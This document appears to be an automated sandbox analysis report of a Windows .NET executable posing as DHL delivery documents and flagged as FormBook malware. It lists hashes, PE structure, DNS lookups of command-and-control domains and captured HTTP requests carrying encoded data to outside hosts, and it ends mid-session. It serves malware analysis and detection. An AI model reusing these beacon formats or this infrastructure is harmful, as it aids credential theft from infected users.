                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                      Malicious:false
                      Preview:[ZoneTransfer]....ZoneId=0

                      Static File Info

                      General

                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Entropy (8bit):7.030426163836173
                      TrID:
                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      • Win32 Executable (generic) a (10002005/4) 49.78%
                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                      • Generic Win/DOS Executable (2004/3) 0.01%
                      • DOS Executable Generic (2002/1) 0.01%
                      File name:DHL_Delivery Documents.exe
                      File size:939'520 bytes
                      MD5:9c930da2ac186c1f945a7bc74aa491ed
                      SHA1:3b24459060ab8590b7c550d34bd0243cbade3e2a
                      SHA256:25bbd4a45d4d02d8bacdf482696505ab302ad8591b5e06da57481f7098324f9e
                      SHA512:99c5621f5bb2fd33f780d956d46ab4c61e179aa489fe58f97bc91371e4270ee7676c671c45cb681197ca4c5b17f0b875dd269170e4ef12f4798f1a6bd31fe91c
                      SSDEEP:12288:T83vsUudRAh+fPkiqchEjXHHfYlFajGI8+xKGDPm2c4i1Sp+LrJ26AQ8:T8/kAhGhEj3wlFa6wxTCD4iDL43l
                      TLSH:B6159E3D18F922E29164C6A8CFE0C627B410F8EA31936935A9D24B55574BE0FBDC327D
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..L...........j... ........@.. ....................................@................................

                      File Icon

                      Icon Hash:00928e8e8686b000

                      Static PE Info

                      General

                      Entrypoint:0x4e6ade
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Time Stamp:0xDBE1BAC7 [Sun Nov 24 19:15:19 2086 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:4
                      OS Version Minor:0
                      File Version Major:4
                      File Version Minor:0
                      Subsystem Version Major:4
                      Subsystem Version Minor:0
                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                      Entrypoint Preview

                      Instruction
                      jmp dword ptr [00402000h]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al

                      Data Directories

                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0xe6a890x4f.text
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xe80000x5c4.rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xea0000xc.reloc
                      IMAGE_DIRECTORY_ENTRY_DEBUG0xe4e900x70.text
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                      Sections

                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      .text0x20000xe4ae40xe4c00d2b9113fe8a27c6162cda83369800543False0.7176176144125683data7.036454178640072IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      .rsrc0xe80000x5c40x600a72fc84a37b831c10f56340ad308c6bdFalse0.423828125data4.117955892303824IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .reloc0xea0000xc0x2003c3ff6f7bc535a2fc5b599e7379c44edFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                      Resources

                      NameRVASizeTypeLanguageCountryZLIB Complexity
                      RT_VERSION0xe80900x334data0.42317073170731706
                      RT_MANIFEST0xe83d40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                      Imports

                      DLLImport
                      mscoree.dll_CorExeMain

                      Network Behavior

                      Snort IDS Alerts

                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                      05/23/24-20:29:06.154524TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24971080192.168.2.5103.48.135.8

                      Network Port Distribution

                      TCP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      May 23, 2024 20:29:06.142535925 CEST4971080192.168.2.5103.48.135.8
                      May 23, 2024 20:29:06.149619102 CEST8049710103.48.135.8192.168.2.5
                      May 23, 2024 20:29:06.149727106 CEST4971080192.168.2.5103.48.135.8
                      May 23, 2024 20:29:06.154524088 CEST4971080192.168.2.5103.48.135.8
                      May 23, 2024 20:29:06.209666014 CEST8049710103.48.135.8192.168.2.5
                      May 23, 2024 20:29:07.014317036 CEST8049710103.48.135.8192.168.2.5
                      May 23, 2024 20:29:07.019054890 CEST8049710103.48.135.8192.168.2.5
                      May 23, 2024 20:29:07.019175053 CEST4971080192.168.2.5103.48.135.8
                      May 23, 2024 20:29:07.020560026 CEST4971080192.168.2.5103.48.135.8
                      May 23, 2024 20:29:07.069839954 CEST8049710103.48.135.8192.168.2.5
                      May 23, 2024 20:29:30.182806969 CEST4971180192.168.2.5172.67.214.17
                      May 23, 2024 20:29:30.187788963 CEST8049711172.67.214.17192.168.2.5
                      May 23, 2024 20:29:30.188148022 CEST4971180192.168.2.5172.67.214.17
                      May 23, 2024 20:29:30.189594030 CEST4971180192.168.2.5172.67.214.17
                      May 23, 2024 20:29:30.243305922 CEST8049711172.67.214.17192.168.2.5
                      May 23, 2024 20:29:30.921179056 CEST8049711172.67.214.17192.168.2.5
                      May 23, 2024 20:29:30.925868034 CEST8049711172.67.214.17192.168.2.5
                      May 23, 2024 20:29:30.928771019 CEST4971180192.168.2.5172.67.214.17
                      May 23, 2024 20:29:31.692837000 CEST4971180192.168.2.5172.67.214.17
                      May 23, 2024 20:29:32.711237907 CEST4971280192.168.2.5172.67.214.17
                      May 23, 2024 20:29:32.716259003 CEST8049712172.67.214.17192.168.2.5
                      May 23, 2024 20:29:32.716376066 CEST4971280192.168.2.5172.67.214.17
                      May 23, 2024 20:29:32.718127012 CEST4971280192.168.2.5172.67.214.17
                      May 23, 2024 20:29:32.769849062 CEST8049712172.67.214.17192.168.2.5
                      May 23, 2024 20:29:33.471339941 CEST8049712172.67.214.17192.168.2.5
                      May 23, 2024 20:29:33.476043940 CEST8049712172.67.214.17192.168.2.5
                      May 23, 2024 20:29:33.476136923 CEST4971280192.168.2.5172.67.214.17
                      May 23, 2024 20:29:34.225544930 CEST4971280192.168.2.5172.67.214.17
                      May 23, 2024 20:29:35.255434036 CEST4971380192.168.2.5172.67.214.17
                      May 23, 2024 20:29:35.260838985 CEST8049713172.67.214.17192.168.2.5
                      May 23, 2024 20:29:35.260972023 CEST4971380192.168.2.5172.67.214.17
                      May 23, 2024 20:29:35.263061047 CEST4971380192.168.2.5172.67.214.17
                      May 23, 2024 20:29:35.269814968 CEST8049713172.67.214.17192.168.2.5
                      May 23, 2024 20:29:35.315675020 CEST8049713172.67.214.17192.168.2.5
                      May 23, 2024 20:29:36.015850067 CEST8049713172.67.214.17192.168.2.5
                      May 23, 2024 20:29:36.020658970 CEST8049713172.67.214.17192.168.2.5
                      May 23, 2024 20:29:36.021152020 CEST4971380192.168.2.5172.67.214.17
                      May 23, 2024 20:29:36.770883083 CEST4971380192.168.2.5172.67.214.17
                      May 23, 2024 20:29:37.789593935 CEST4971480192.168.2.5172.67.214.17
                      May 23, 2024 20:29:37.794645071 CEST8049714172.67.214.17192.168.2.5
                      May 23, 2024 20:29:37.794795036 CEST4971480192.168.2.5172.67.214.17
                      May 23, 2024 20:29:37.797410965 CEST4971480192.168.2.5172.67.214.17
                      May 23, 2024 20:29:37.849877119 CEST8049714172.67.214.17192.168.2.5
                      May 23, 2024 20:29:38.578330994 CEST8049714172.67.214.17192.168.2.5
                      May 23, 2024 20:29:38.588238001 CEST8049714172.67.214.17192.168.2.5
                      May 23, 2024 20:29:38.588372946 CEST4971480192.168.2.5172.67.214.17
                      May 23, 2024 20:29:38.589107037 CEST4971480192.168.2.5172.67.214.17
                      May 23, 2024 20:29:38.641992092 CEST8049714172.67.214.17192.168.2.5

                      UDP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      May 23, 2024 20:28:58.546681881 CEST5007353192.168.2.51.1.1.1
                      May 23, 2024 20:28:59.536812067 CEST5007353192.168.2.51.1.1.1
                      May 23, 2024 20:29:00.536761045 CEST5007353192.168.2.51.1.1.1
                      May 23, 2024 20:29:00.632924080 CEST53500731.1.1.1192.168.2.5
                      May 23, 2024 20:29:00.679876089 CEST53500731.1.1.1192.168.2.5
                      May 23, 2024 20:29:00.679887056 CEST53500731.1.1.1192.168.2.5
                      May 23, 2024 20:29:05.680784941 CEST5491053192.168.2.51.1.1.1
                      May 23, 2024 20:29:06.132915974 CEST53549101.1.1.1192.168.2.5
                      May 23, 2024 20:29:22.057769060 CEST5281253192.168.2.51.1.1.1
                      May 23, 2024 20:29:22.070039988 CEST53528121.1.1.1192.168.2.5
                      May 23, 2024 20:29:30.133668900 CEST4956853192.168.2.51.1.1.1
                      May 23, 2024 20:29:30.180363894 CEST53495681.1.1.1192.168.2.5
                      May 23, 2024 20:29:43.709440947 CEST5028053192.168.2.51.1.1.1
                      May 23, 2024 20:29:43.797393084 CEST53502801.1.1.1192.168.2.5

                      DNS Queries

                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                      May 23, 2024 20:28:58.546681881 CEST192.168.2.51.1.1.10xfc98Standard query (0)www.bookingshop01.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:28:59.536812067 CEST192.168.2.51.1.1.10xfc98Standard query (0)www.bookingshop01.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:29:00.536761045 CEST192.168.2.51.1.1.10xfc98Standard query (0)www.bookingshop01.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:29:05.680784941 CEST192.168.2.51.1.1.10xf47dStandard query (0)www.uzonedich.comA (IP address)IN (0x0001)false
                      May 23, 2024 20:29:22.057769060 CEST192.168.2.51.1.1.10xf2c1Standard query (0)www.7egiy1.cfdA (IP address)IN (0x0001)false
                      May 23, 2024 20:29:30.133668900 CEST192.168.2.51.1.1.10xad31Standard query (0)www.alexbruma.comA (IP address)IN (0x0001)false
                      May 23, 2024 20:29:43.709440947 CEST192.168.2.51.1.1.10xc361Standard query (0)www.prospin.clickA (IP address)IN (0x0001)false

                      DNS Answers

                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                      May 23, 2024 20:29:00.632924080 CEST1.1.1.1192.168.2.50xfc98Server failure (2)www.bookingshop01.topnonenoneA (IP address)IN (0x0001)false
                      May 23, 2024 20:29:00.679876089 CEST1.1.1.1192.168.2.50xfc98Server failure (2)www.bookingshop01.topnonenoneA (IP address)IN (0x0001)false
                      May 23, 2024 20:29:00.679887056 CEST1.1.1.1192.168.2.50xfc98Server failure (2)www.bookingshop01.topnonenoneA (IP address)IN (0x0001)false
                      May 23, 2024 20:29:06.132915974 CEST1.1.1.1192.168.2.50xf47dNo error (0)www.uzonedich.com103.48.135.8A (IP address)IN (0x0001)false
                      May 23, 2024 20:29:22.070039988 CEST1.1.1.1192.168.2.50xf2c1Name error (3)www.7egiy1.cfdnonenoneA (IP address)IN (0x0001)false
                      May 23, 2024 20:29:30.180363894 CEST1.1.1.1192.168.2.50xad31No error (0)www.alexbruma.com172.67.214.17A (IP address)IN (0x0001)false
                      May 23, 2024 20:29:30.180363894 CEST1.1.1.1192.168.2.50xad31No error (0)www.alexbruma.com104.21.77.252A (IP address)IN (0x0001)false
                      May 23, 2024 20:29:43.797393084 CEST1.1.1.1192.168.2.50xc361Name error (3)www.prospin.clicknonenoneA (IP address)IN (0x0001)false

                      HTTP Request Dependency Graph

                      • www.uzonedich.com
                      • www.alexbruma.com

                      HTTP Packets

                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.549710103.48.135.8801352C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:29:06.154524088 CEST511OUTGET /ew0m/?Urf=R9oUCj0Kr0tjZSdhKcVG72tknPUSe2YfdfzFTAWqH1uH1Z8SvVf85mUnaA3f99ILEbWrEuJ+fmKqJVRYQbENh1wm0L+Vjxgcu0XuSfZ61wplFH4xX6XBL/wdg7Pf2vzXJQ==&pP=fPyhqn_HwdI HTTP/1.1
                      Host: www.uzonedich.com
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-US
                      Connection: close
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                      May 23, 2024 20:29:07.014317036 CEST691INHTTP/1.1 403 Forbidden
                      Server: nginx
                      Date: Thu, 23 May 2024 18:29:06 GMT
                      Content-Type: text/html
                      Content-Length: 548
                      Connection: close
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                      Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      1192.168.2.549711172.67.214.17801352C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:29:30.189594030 CEST771OUTPOST /0eyj/ HTTP/1.1
                      Host: www.alexbruma.com
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-US
                      Accept-Encoding: gzip, deflate, br
                      Origin: http://www.alexbruma.com
                      Referer: http://www.alexbruma.com/0eyj/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 204
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                      Data Raw: 55 72 66 3d 38 5a 6b 6c 74 72 53 34 42 45 45 4d 34 4c 59 49 55 62 6c 2b 4f 75 68 73 49 46 72 5a 6e 71 36 4b 41 32 48 55 36 72 35 44 2f 69 49 53 46 6d 58 69 49 31 77 36 4d 50 6a 6f 4d 4f 6e 68 7a 6b 75 61 67 61 30 37 72 71 65 52 55 6e 43 49 5a 58 2b 4c 30 2f 2b 77 78 31 63 45 69 31 4d 66 5a 72 52 55 34 77 70 51 71 64 52 63 58 71 6d 54 51 64 4b 62 43 6d 73 4f 50 48 6b 6c 66 63 33 6c 64 78 75 4f 6f 31 58 62 55 74 52 4a 42 65 76 31 2b 53 55 6b 4e 72 53 66 78 45 52 63 70 30 58 75 38 77 63 4f 55 42 46 4e 41 36 30 63 51 52 4f 53 4f 76 33 7a 31 37 56 4c 6a 63 75 4a 68 4f 6f 4e 52 59 4b 70 63 43 72 57 41 52 34 3d
                      Data Ascii: Urf=8ZkltrS4BEEM4LYIUbl+OuhsIFrZnq6KA2HU6r5D/iISFmXiI1w6MPjoMOnhzkuaga07rqeRUnCIZX+L0/+wx1cEi1MfZrRU4wpQqdRcXqmTQdKbCmsOPHklfc3ldxuOo1XbUtRJBev1+SUkNrSfxERcp0Xu8wcOUBFNA60cQROSOv3z17VLjcuJhOoNRYKpcCrWAR4=
                      May 23, 2024 20:29:30.921179056 CEST816INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:29:30 GMT
                      Content-Type: text/html; charset=iso-8859-1
                      Transfer-Encoding: chunked
                      Connection: close
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jTDzKzRHGF6T7c3wPmmJUP2aLUqZYFsOZH7jrvhqEFg4rJXjwQjj0XGOOna9U8sTe6Jfo2gh2biqAlIveAApqbQ8W65HFqOR1o9%2BqFbFwKlsqfbziKo4ndIRZW%2BAJVQIb8%2B3hA%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88871ca27ba97cac-EWR
                      Content-Encoding: gzip
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 61 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8e 3d 0f 82 40 10 44 7b 7e c5 4a 2f 0b 86 72 73 85 7c 44 12 44 62 8e c2 12 73 6b 0e 83 1c c2 a1 e1 df 1b a0 b1 9d 79 f3 32 b4 8b 2f 91 bc 95 09 9c e4 39 87 b2 3a e6 59 04 ee 1e 31 4b 64 8a 18 cb 78 6b 0e 9e 8f 98 14 ae 70 48 db 57 2b 48 73 ad 84 43 b6 b1 2d 8b d0 0f a1 30 16 52 33 75 8a 70 0b 1d c2 15 a2 bb 51 f3 b2 0b c4 1f a3 03 e1 50 2f a4 66 18 f8 3d f1 68 59 41 75 cd 01 7d 9e 9f 08 df 7a 84 ce 58 78 2c 38 98 0e ac 6e 46 18 79 f8 f0 e0 11 f6 8b 7e 15 13 ae 87 7e 00 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 12 39 e5 cd cb 00 00 00 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: adL=@D{~J/rs|DDbsky2/9:Y1KdxkpHW+HsC-0R3upQP/f=hYAu}zXx,8nFy~~b90


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      2192.168.2.549712172.67.214.17801352C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:29:32.718127012 CEST791OUTPOST /0eyj/ HTTP/1.1
                      Host: www.alexbruma.com
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-US
                      Accept-Encoding: gzip, deflate, br
                      Origin: http://www.alexbruma.com
                      Referer: http://www.alexbruma.com/0eyj/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 224
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                      Data Raw: 55 72 66 3d 38 5a 6b 6c 74 72 53 34 42 45 45 4d 69 71 6f 49 58 34 4e 2b 4c 4f 68 76 44 6c 72 5a 75 4b 36 4f 41 32 4c 55 36 70 56 54 2b 57 6b 53 46 47 6e 69 50 30 77 36 50 50 6a 6f 5a 2b 6d 72 75 30 75 52 67 61 78 47 72 6f 4b 52 55 6a 71 49 5a 57 4f 4c 31 4f 2b 2f 2b 46 63 47 76 56 4d 5a 54 4c 52 55 34 77 70 51 71 64 56 36 58 71 2b 54 51 74 61 62 46 33 73 50 44 6e 6b 69 50 4d 33 6c 5a 78 75 53 6f 31 58 35 55 70 52 6e 42 63 48 31 2b 54 6b 6b 4e 2b 79 63 2b 45 52 47 6d 55 57 62 2f 43 39 68 57 78 78 42 64 71 68 4e 50 77 57 51 43 35 61 5a 76 5a 64 6a 77 38 43 78 78 64 67 36 41 6f 72 41 47 68 37 6d 65 47 74 4d 4b 44 6b 64 4b 4e 4f 36 52 74 63 45 32 54 46 47 4d 53 6c 31
                      Data Ascii: Urf=8ZkltrS4BEEMiqoIX4N+LOhvDlrZuK6OA2LU6pVT+WkSFGniP0w6PPjoZ+mru0uRgaxGroKRUjqIZWOL1O+/+FcGvVMZTLRU4wpQqdV6Xq+TQtabF3sPDnkiPM3lZxuSo1X5UpRnBcH1+TkkN+yc+ERGmUWb/C9hWxxBdqhNPwWQC5aZvZdjw8Cxxdg6AorAGh7meGtMKDkdKNO6RtcE2TFGMSl1
                      May 23, 2024 20:29:33.471339941 CEST813INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:29:33 GMT
                      Content-Type: text/html; charset=iso-8859-1
                      Transfer-Encoding: chunked
                      Connection: close
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zyCJTmDV9ptbaS1LmXnX3s2wST%2FMbCNKmJzEUCj3PwPKcLPZaBEUBJQ7wSP9BeU1CH%2Bvb%2BvjgLgkMolS3mre3FWg86VlHduzeGggAamCEeRTfjFc1Uuq5uE8gviAp2%2BYQDLwXA%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88871cb238350c8a-EWR
                      Content-Encoding: gzip
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 62 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8e 3d 0f 82 40 10 44 7b 7e c5 4a 2f 0b 86 72 73 85 7c 44 12 44 62 8e c2 12 73 6b 0e 83 1c c2 a1 e1 df 1b a0 b1 9d 79 f3 32 b4 8b 2f 91 bc 95 09 9c e4 39 87 b2 3a e6 59 04 ee 1e 31 4b 64 8a 18 cb 78 6b 0e 9e 8f 98 14 ae 70 48 db 57 2b 48 73 ad 84 43 b6 b1 2d 8b d0 0f a1 30 16 52 33 75 8a 70 0b 1d c2 15 a2 bb 51 f3 b2 0b c4 1f a3 03 e1 50 2f a4 66 18 f8 3d f1 68 59 41 75 cd 01 7d 9e 9f 08 df 7a 84 ce 58 78 2c 38 98 0e ac 6e 46 18 79 f8 f0 e0 11 f6 8b 7e 15 13 ae 87 7e 00 00 00 ff ff e3 02 00 12 39 e5 cd cb 00 00 00 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: b8L=@D{~J/rs|DDbsky2/9:Y1KdxkpHW+HsC-0R3upQP/f=hYAu}zXx,8nFy~~90


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      3192.168.2.549713172.67.214.17801352C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:29:35.263061047 CEST1808OUTPOST /0eyj/ HTTP/1.1
                      Host: www.alexbruma.com
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-US
                      Accept-Encoding: gzip, deflate, br
                      Origin: http://www.alexbruma.com
                      Referer: http://www.alexbruma.com/0eyj/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 1240
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
